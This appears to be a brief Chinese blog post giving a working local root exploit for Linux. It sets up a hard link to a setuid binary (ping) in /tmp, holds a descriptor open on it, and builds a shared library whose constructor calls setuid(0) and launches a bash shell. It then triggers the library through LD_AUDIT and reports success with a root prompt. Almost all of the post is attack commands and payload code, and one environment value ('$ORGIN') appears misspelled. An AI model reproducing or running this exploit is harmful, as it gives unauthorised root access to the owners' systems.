root下添加一个testuser1帐户
设置密码
su testuser1
cd ~
mkdir -p /tmp/ex1
ln /bin/ping /tmp/ex1/target
exec 3< /tmp/ex1/target
rm -rf /tmp/ex1
再执行
ls -l /proc/$$/fd/3
显示
lr-x------ 1 testuser1 testuser1 64 Dec 28 11:48 /proc/21958/fd/3 -> /tmp/ex1/target (deleted)
cd ~
[testuser1@mail ~]$ vi payload.c
内容
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
执行
gcc -w -fPIC -shared -o /tmp/ex1 payload.c
而后看一下
[testuser1@mail ~]$ ls -al /tmp/ex1
-rwxrwxr-x 1 testuser1 testuser1 4223 Dec 28 11:50 /tmp/ex1
执行
[testuser1@mail ~]$ LD_AUDIT="$ORGIN" exec /proc/self/fd/3
结果是:
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
#
[root@mail]$提权成功。
阅读(1828) | 评论(0) | 转发(0) |